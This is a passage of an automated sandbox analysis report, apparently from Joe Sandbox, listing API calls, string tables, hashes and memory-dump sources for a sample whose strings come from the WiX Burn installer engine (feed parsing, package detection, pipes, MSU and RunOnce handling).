                                                                                                                                                                                                                                                                            • String ID: Cannot have two content elements in ATOM entry.$Failed to allocate ATOM entry authors.$Failed to allocate ATOM entry categories.$Failed to allocate ATOM entry content.$Failed to allocate ATOM entry id.$Failed to allocate ATOM entry links.$Failed to allocate ATOM entry published.$Failed to allocate ATOM entry summary.$Failed to allocate ATOM entry title.$Failed to allocate ATOM entry updated.$Failed to find required feed/entry/id element.$Failed to find required feed/entry/title element.$Failed to find required feed/entry/updated element.$Failed to get child nodes of ATOM entry element.$Failed to parse ATOM entry author.$Failed to parse ATOM entry category.$Failed to parse ATOM entry content.$Failed to parse ATOM entry link.$Failed to parse unknown ATOM entry element: %ls$Failed to process all ATOM entry elements.$author$cabinet.dll$category$clbcatq.dll$content$crypt32.dll$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp$link$msi.dll$published$summary$title$updated$version.dll
                                                                                                                                                                                                                                                                            • API String ID: 318886736-3340435141
                                                                                                                                                                                                                                                                            • Opcode ID: 46d4ba0c7a79969ba2f666a039c6e58cf309c261ce41e96de6903242b5c846ab
                                                                                                                                                                                                                                                                            • Instruction ID: 1056a5805e968d67fbbb856419a678fc9eb3cc8c6d38a29686db1fd9fafe20a0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 46d4ba0c7a79969ba2f666a039c6e58cf309c261ce41e96de6903242b5c846ab
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 62E10632A88305BBDF218B94CC4AF6F7679EB85B25F214265F614BB2D0EAB09D00D750
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 009401DE: VariantInit.OLEAUT32(?), ref: 009401F5
                                                                                                                                                                                                                                                                              • Part of subcall function 009401DE: VariantClear.OLEAUT32(?), ref: 00940340
                                                                                                                                                                                                                                                                              • Part of subcall function 009401DE: SysFreeString.OLEAUT32(00000000), ref: 0094034B
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,00000000,condition,00000000,?,DetectionType,?,00000000,?,00000000,00000002,?,008F6624,00000000), ref: 009136DB
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,00000000,arp,00000000,?,008F6624,00000000,?), ref: 009137DB
                                                                                                                                                                                                                                                                              • Part of subcall function 009401DE: SysAllocString.OLEAUT32(?), ref: 0094022F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: String$CompareVariant$AllocClearFreeInit
                                                                                                                                                                                                                                                                            • String ID: ArpDisplayVersion$ArpId$ArpWin64$Bundle$DetectCondition$DetectionType$Failed to build full key path.$Failed to get @ArpDisplayVersion.$Failed to get @ArpId.$Failed to get @ArpWin64.$Failed to get @Bundle.$Failed to get @DetectCondition.$Failed to get @DetectionType.$Failed to get @InstallArguments.$Failed to get @Protocol.$Failed to get @RepairArguments.$Failed to get @Repairable.$Failed to get @UninstallArguments.$Failed to get @Uninstallable.$Failed to parse @ArpDisplayVersion: %ls$Failed to parse command lines.$Failed to parse exit codes.$InstallArguments$Invalid detection type: %ls$Invalid protocol type: %ls$Protocol$RepairArguments$Repairable$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\$UninstallArguments$Uninstallable$arp$burn$condition$d:\a\wix4\wix4\src\burn\engine\exeengine.cpp$netfx4$none
                                                                                                                                                                                                                                                                            • API String ID: 702752599-1746888974
                                                                                                                                                                                                                                                                            • Opcode ID: e98a183f4438e0538f9397261fb2e5d7d6b5040d8e1ccc47b36346be3bc4a528
                                                                                                                                                                                                                                                                            • Instruction ID: 9d258a9f20481aa3f9d46393821ae6197537a1caa30e2590b5f45f7fa401dcc2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e98a183f4438e0538f9397261fb2e5d7d6b5040d8e1ccc47b36346be3bc4a528
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95E12971BC0729B6D631A6614C4BFFB696C9B45F64F11C210FB58BB1C0D2A49F8096E0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,00000000,?,00000000,00000000), ref: 0094B1BE
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF), ref: 0094B1DD
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CompareString
                                                                                                                                                                                                                                                                            • String ID: Failed to allocate application identity.$Failed to allocate application summary.$Failed to allocate application title.$Failed to allocate application type.$Failed to allocate content type.$Failed to allocate content.$Failed to allocate enclosures for application update entry.$Failed to allocate upgrade id.$Failed to compare version to upgrade version.$Failed to parse enclosure.$Failed to parse upgrade version string '%ls' from ATOM entry.$Failed to parse version string '%ls' from ATOM entry.$Upgrade version is greater than or equal to application version.$application$clbcatq.dll$comres.dll$crypt32.dll$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\apuputil.cpp$enclosure$exclusive$http://appsyndication.org/2006/appsyn$msasn1.dll$msi.dll$true$type$upgrade$version$version.dll$wininet.dll
                                                                                                                                                                                                                                                                            • API String ID: 1825529933-1736944660
                                                                                                                                                                                                                                                                            • Opcode ID: 8754de8d021e4f00560463b80f414fd5ae869da5df58b26132f6a691d64a67b5
                                                                                                                                                                                                                                                                            • Instruction ID: d9e7c2a98d40c39c6e74fa871af71fa89105981b0df0d8c0c25f6f64430c762b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8754de8d021e4f00560463b80f414fd5ae869da5df58b26132f6a691d64a67b5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 68D1F532684701FBDB219F55CC4AF5B77A9AB85B24F318655F624BB2D2DBB0E900DB00
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(00000000,00000000,008E7D9B,008E7DDB,?,009040B9,?,?,008E7D5B,?,?,?,?,?,008E7D9B), ref: 008EBA98
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(00000000,?,009040B9,?,?,008E7D5B,?,?,?,?,?,008E7D9B), ref: 008EC00D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                            • String ID: Attempt to add built-in variable: %ls$Attempt to add variable again: %ls$Failed to change variant type.$Failed to find variable value '%ls'.$Failed to get @Hidden.$Failed to get @Id.$Failed to get @Persisted.$Failed to get @Type.$Failed to get @Value.$Failed to get next node.$Failed to get variable node count.$Failed to insert variable '%ls'.$Failed to select variable nodes.$Failed to set value of variable: %ls$Failed to set variant value.$Hidden$Initializing formatted variable '%ls' to value '%ls'$Initializing hidden variable '%ls'$Initializing numeric variable '%ls' to value '%ls'$Initializing string variable '%ls' to value '%ls'$Initializing version variable '%ls' to value '%ls'$Invalid value for @Type: %ls$Persisted$Type$Value$Variable$d:\a\wix4\wix4\src\burn\engine\variable.cpp$formatted$numeric$string$version
                                                                                                                                                                                                                                                                            • API String ID: 3168844106-1770900757
                                                                                                                                                                                                                                                                            • Opcode ID: a5324e2550a743b6d67285b41ada596413ae1caa8244fbec21c473ee2a0bd9d9
                                                                                                                                                                                                                                                                            • Instruction ID: 8691c17acccc48ce20b7e55a542b5a221f02aa1b3b2b63010b1b69f10b89839b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a5324e2550a743b6d67285b41ada596413ae1caa8244fbec21c473ee2a0bd9d9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8F12331A84259BBDF11DA96CC0AFEF7A75FF8AB15F210014FA14FA1D1DBB19A009B50
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CompareStringW.KERNEL32(0000007F,00000000,?,00000000,rel,00000000,?,?,?,00000000), ref: 0094A40F
                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 0094A6E8
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • msi.dll, xrefs: 0094A624
                                                                                                                                                                                                                                                                            • Failed to allocate ATOM link href., xrefs: 0094A46F
                                                                                                                                                                                                                                                                            • msasn1.dll, xrefs: 0094A6B6
                                                                                                                                                                                                                                                                            • version.dll, xrefs: 0094A552
                                                                                                                                                                                                                                                                            • href, xrefs: 0094A442
                                                                                                                                                                                                                                                                            • Failed to allocate ATOM link value., xrefs: 0094A6C2
                                                                                                                                                                                                                                                                            • title, xrefs: 0094A4D4
                                                                                                                                                                                                                                                                            • type, xrefs: 0094A512
                                                                                                                                                                                                                                                                            • Failed to allocate ATOM link rel., xrefs: 0094A42D
                                                                                                                                                                                                                                                                            • crypt32.dll, xrefs: 0094A45F
                                                                                                                                                                                                                                                                            • Failed to parse unknown ATOM link attribute: %ls, xrefs: 0094A5B0
                                                                                                                                                                                                                                                                            • Failed to parse unknown ATOM link element: %ls, xrefs: 0094A692
                                                                                                                                                                                                                                                                            • comres.dll, xrefs: 0094A49E
                                                                                                                                                                                                                                                                            • Failed get attributes for ATOM link., xrefs: 0094A3BE
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp, xrefs: 0094A3CD, 0094A6A1, 0094A6D1
                                                                                                                                                                                                                                                                            • Failed to allocate ATOM link type., xrefs: 0094A53B
                                                                                                                                                                                                                                                                            • Failed to parse ATOM link length., xrefs: 0094A4BF
                                                                                                                                                                                                                                                                            • Failed to process all ATOM link attributes., xrefs: 0094A5C6
                                                                                                                                                                                                                                                                            • Failed to allocate ATOM link title., xrefs: 0094A4FD
                                                                                                                                                                                                                                                                            • rel, xrefs: 0094A403
                                                                                                                                                                                                                                                                            • Failed to process all ATOM link elements., xrefs: 0094A67E
                                                                                                                                                                                                                                                                            • Failed to get child nodes of ATOM link element., xrefs: 0094A5F7
                                                                                                                                                                                                                                                                            • length, xrefs: 0094A484
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: String$CompareFree
                                                                                                                                                                                                                                                                            • String ID: Failed get attributes for ATOM link.$Failed to allocate ATOM link href.$Failed to allocate ATOM link rel.$Failed to allocate ATOM link title.$Failed to allocate ATOM link type.$Failed to allocate ATOM link value.$Failed to get child nodes of ATOM link element.$Failed to parse ATOM link length.$Failed to parse unknown ATOM link attribute: %ls$Failed to parse unknown ATOM link element: %ls$Failed to process all ATOM link attributes.$Failed to process all ATOM link elements.$comres.dll$crypt32.dll$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp$href$length$msasn1.dll$msi.dll$rel$title$type$version.dll
                                                                                                                                                                                                                                                                            • API String ID: 3589242889-4187876800
                                                                                                                                                                                                                                                                            • Opcode ID: 70b9c0bf68002aeeb42fc4dc841b39c6cdd9754f1eac411a23d5d26b686470aa
                                                                                                                                                                                                                                                                            • Instruction ID: a64ad7de9fcde37cd56be0a1b3e6cbe0a6037a8b52b0c1d63befaf494e47b1eb
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 70b9c0bf68002aeeb42fc4dc841b39c6cdd9754f1eac411a23d5d26b686470aa
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DDB1E236AD4208BBDF129B90CC49FAF3B79EBC5B15F154059F608A71E0EB709A00EB51
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(00000024,80000000,00000024,00000000,00000003,08000080,00000000,00000000,00000000,00000024,000000F8,00000001,00000000,000000F8,00000024,?), ref: 0094364E
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0094365C
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0094366E
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast$CreateFile
                                                                                                                                                                                                                                                                            • String ID: *wzSrcPath is null$Failed to allocate memory to read in file: %ls$Failed to completely read file: %ls$Failed to get size of file: %ls$Failed to load file: %ls, too large.$Failed to open file: %ls$Failed to re-allocate memory to read in file: %ls$Failed to read from file: %ls$Failed to seek position %d$Invalid argument pcbDest$Invalid argument ppbDest$Invalid argument wzSrcPath$Start position %d bigger than file '%ls' size %llu$Underflow calculating remaining buffer size.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 1722934493-1341987655
                                                                                                                                                                                                                                                                            • Opcode ID: d7842f2e51f3db193ba9a5133f698a47241cc3b1366253d0ce9d72e8424b3feb
                                                                                                                                                                                                                                                                            • Instruction ID: 5b241412f9b96d71e890867f046e5b512916acdb605778d264dad6c2ca9e85a2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7842f2e51f3db193ba9a5133f698a47241cc3b1366253d0ce9d72e8424b3feb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2AC1FCB2B80315BBEB209A758C4FF7F7668EF45B54F118119B915FB2C1E7B48E009690
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,00000000,00000000,?), ref: 008FB729
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008FB737
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 008FB75B
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateErrorFileLastSleep
                                                                                                                                                                                                                                                                            • String ID: @1Wu$Failed to allocate name of parent cache pipe.$Failed to allocate name of parent logging pipe.$Failed to allocate name of parent pipe.$Failed to open companion process with PID: %u$Failed to open parent cache pipe: %ls$Failed to open parent logging pipe: %ls$Failed to open parent pipe: %ls$Failed to verify parent cache pipe: %ls$Failed to verify parent logging pipe: %ls$Failed to verify parent pipe: %ls$\\.\pipe\%ls$\\.\pipe\%ls.Cache$\\.\pipe\%ls.Log$d:\a\wix4\wix4\src\burn\engine\pipe.cpp
                                                                                                                                                                                                                                                                            • API String ID: 408151869-3151869001
                                                                                                                                                                                                                                                                            • Opcode ID: 2dbcfb73ca6e85af31c84861a895a742f03ab8ceeb5a5c1f99cba942428cf226
                                                                                                                                                                                                                                                                            • Instruction ID: c7ee473845070406c8822cfdfe9bc870320b63b6456596df8ba9535a19e45703
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2dbcfb73ca6e85af31c84861a895a742f03ab8ceeb5a5c1f99cba942428cf226
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 39710976E80729B7EB2196B5CC0AFBA6958FF45B65F210220FF10FB1D0E3A49D0096D5
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00919AD9
                                                                                                                                                                                                                                                                              • Part of subcall function 0093BFC9: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,008E6E9A,00000001,008E6DEA,?,?,?,00947562,00000000), ref: 0093BFE1
                                                                                                                                                                                                                                                                              • Part of subcall function 0093BFC9: GetProcAddress.KERNEL32(00000000), ref: 0093BFE8
                                                                                                                                                                                                                                                                              • Part of subcall function 0093BFC9: GetLastError.KERNEL32(?,?,?,00947562,00000000), ref: 0093C010
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,?,?), ref: 00919DF5
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,?,?), ref: 00919E04
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to get cached path for package: %ls, xrefs: 00919BD0
                                                                                                                                                                                                                                                                            • Failed to allocate WUSA.exe path., xrefs: 00919B7B
                                                                                                                                                                                                                                                                            • Failed to build MSU path., xrefs: 00919C20
                                                                                                                                                                                                                                                                            • /log:, xrefs: 00919C7A
                                                                                                                                                                                                                                                                            • Failed to run MSU process, xrefs: 00919D47
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\msuengine.cpp, xrefs: 00919AFD, 00919BE2, 00919D59
                                                                                                                                                                                                                                                                            • Failed to find System32 directory., xrefs: 00919B50
                                                                                                                                                                                                                                                                            • Failed to ensure WU service was enabled to install MSU package., xrefs: 00919D10
                                                                                                                                                                                                                                                                            • Failed to determine WOW64 status., xrefs: 00919AEB
                                                                                                                                                                                                                                                                            • Failed to format MSU install command., xrefs: 00919C54
                                                                                                                                                                                                                                                                            • Failed to append SysNative directory., xrefs: 00919B31
                                                                                                                                                                                                                                                                            • wusa.exe, xrefs: 00919B68
                                                                                                                                                                                                                                                                            • Failed to append log switch to MSU command-line., xrefs: 00919C8E
                                                                                                                                                                                                                                                                            • "%ls" "%ls" /quiet /norestart, xrefs: 00919C40
                                                                                                                                                                                                                                                                            • Failed to append log path to MSU command-line., xrefs: 00919CBA
                                                                                                                                                                                                                                                                            • .Wu@1Wu, xrefs: 00919DF5, 00919E04
                                                                                                                                                                                                                                                                            • SysNative\, xrefs: 00919B21
                                                                                                                                                                                                                                                                            • Failed to get action arguments for MSU package., xrefs: 00919B9B
                                                                                                                                                                                                                                                                            • WixBundleExecutePackageCacheFolder, xrefs: 00919BFB, 00919E1E
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Handle$Close$AddressCurrentErrorLastModuleProcProcess
                                                                                                                                                                                                                                                                            • String ID: /log:$"%ls" "%ls" /quiet /norestart$Failed to allocate WUSA.exe path.$Failed to append SysNative directory.$Failed to append log path to MSU command-line.$Failed to append log switch to MSU command-line.$Failed to build MSU path.$Failed to determine WOW64 status.$Failed to ensure WU service was enabled to install MSU package.$Failed to find System32 directory.$Failed to format MSU install command.$Failed to get action arguments for MSU package.$Failed to get cached path for package: %ls$Failed to run MSU process$SysNative\$WixBundleExecutePackageCacheFolder$d:\a\wix4\wix4\src\burn\engine\msuengine.cpp$wusa.exe$.Wu@1Wu
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00945CB8: UuidCreate.RPCRT4(?), ref: 00945CDB
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000000,08000000,00000000,00000000,?,?,?,?,?), ref: 009267B4
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000000,08000000,00000000,00000000,?,?,?,?,?), ref: 009267CD
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseHandle$CreateUuid
                                                                                                                                                                                                                                                                            • String ID: %ls$%ls /pipe %ls$Failed to CreateProcess on path: %ls$Failed to allocate event name.$Failed to allocate section name.$Failed to append netfx chainer args.$Failed to append user args.$Failed to create netfx chainer guid.$Failed to create netfx chainer.$Failed to get netfx return code.$Failed to process netfx chainer message.$Failed to wait for netfx chainer process to complete$NetFxEvent.%ls$NetFxSection.%ls$d:\a\wix4\wix4\src\burn\engine\netfxchainer.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Action$Addon$Detect$Failed to get @Action.$Failed to get @Id.$Failed to get RelatedBundle element count.$Failed to get RelatedBundle nodes$Failed to get next RelatedBundle element.$Failed to resize Addon code array$Failed to resize Detect code array$Failed to resize Patch code array$Failed to resize Upgrade code array$Invalid value for @Action: %ls$Patch$RelatedBundle$Upgrade$d:\a\wix4\wix4\src\burn\engine\bundlepackageengine.cpp
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetStringTypeW.KERNEL32(00000001,?,00000001,?,00000018,?,00000000,00000000), ref: 008EC9C4
                                                                                                                                                                                                                                                                            • GetStringTypeW.KERNEL32(00000001,?,00000001,00000048), ref: 008ECBEA
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: StringType
                                                                                                                                                                                                                                                                            • String ID: -$AND$Failed to parse condition "%ls". Constant too big, at position %d.$Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d.$Failed to parse condition "%ls". Invalid version format, at position %d.$Failed to parse condition "%ls". Unexpected '~' operator at position %d.$Failed to parse condition "%ls". Unexpected character at position %d.$Failed to parse condition "%ls". Unterminated literal at position %d.$Failed to set symbol value.$H$NOT$Symbol was too long: %ls$d:\a\wix4\wix4\src\burn\engine\condition.cpp
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,00020006,00000000), ref: 008F7CDA
                                                                                                                                                                                                                                                                              • Part of subcall function 0093D789: RegSetValueExW.ADVAPI32(?,008F7A20,008E6CF2,EstimatedSize,000000FF,008E6CF2,00000000,?,008F9AF0,00000000,00000390,000000F8,008E6CF2,009031C1,00000000,00000000), ref: 0093D7AD
                                                                                                                                                                                                                                                                            • RegDeleteValueW.ADVAPI32(00000000,?,?,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,00020006,00000000), ref: 008F7C1F
                                                                                                                                                                                                                                                                            • RegDeleteValueW.ADVAPI32(009031C1,BundleResumeCommandLine,?,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,00020006,00000000), ref: 008F7C6F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Value$Delete$Close
                                                                                                                                                                                                                                                                            • String ID: "%ls" /%ls /%ls$BundleResumeCommandLine$Failed to create run key.$Failed to delete resume command line value.$Failed to delete run key value.$Failed to format resume command line for RunOnce.$Failed to open run key.$Failed to write Installed value.$Failed to write Resume value.$Failed to write resume command line value.$Failed to write run key value.$Installed$Resume$SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce$burn.clean.room$burn.runonce$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetExitCodeThread.KERNEL32(?,00000160,00000001,008E6CF2,00000000,000000FF,008E6DA2,00000000,000000B0,008E6CF2,008E6CF2,009030D0,00000160,?,008E6DA2), ref: 009205A1
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 009205AF
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to execute EXE package., xrefs: 00920684
                                                                                                                                                                                                                                                                            • Failed to get cache thread exit code., xrefs: 009205DF
                                                                                                                                                                                                                                                                            • Cache thread exited unexpectedly with exit code: %u., xrefs: 00920866
                                                                                                                                                                                                                                                                            • Failed to execute BUNDLE package., xrefs: 0092064C
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\apply.cpp, xrefs: 009205D3, 009205D9, 009205ED, 00920850, 0092085B, 00920878, 009208C4
                                                                                                                                                                                                                                                                            • Failed to execute dependency action., xrefs: 00920791
                                                                                                                                                                                                                                                                            • Failed to execute begin MSI transaction action., xrefs: 009207C2
                                                                                                                                                                                                                                                                            • Invalid execute action., xrefs: 009208AB
                                                                                                                                                                                                                                                                            • Failed to execute uninstall MSI compatible package., xrefs: 00920897
                                                                                                                                                                                                                                                                            • Failed to execute MSU package., xrefs: 00920737
                                                                                                                                                                                                                                                                            • Failed to execute related bundle., xrefs: 00920614
                                                                                                                                                                                                                                                                            • Failed to execute commit MSI transaction action., xrefs: 009207EF
                                                                                                                                                                                                                                                                            • Failed to execute MSP package., xrefs: 009206F6
                                                                                                                                                                                                                                                                            • Failed to execute package provider registration action., xrefs: 00920764
                                                                                                                                                                                                                                                                            • Failed to wait for cache check-point., xrefs: 00920883
                                                                                                                                                                                                                                                                            • Failed to execute MSI package., xrefs: 009206BD
Memory Dump Source
• Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
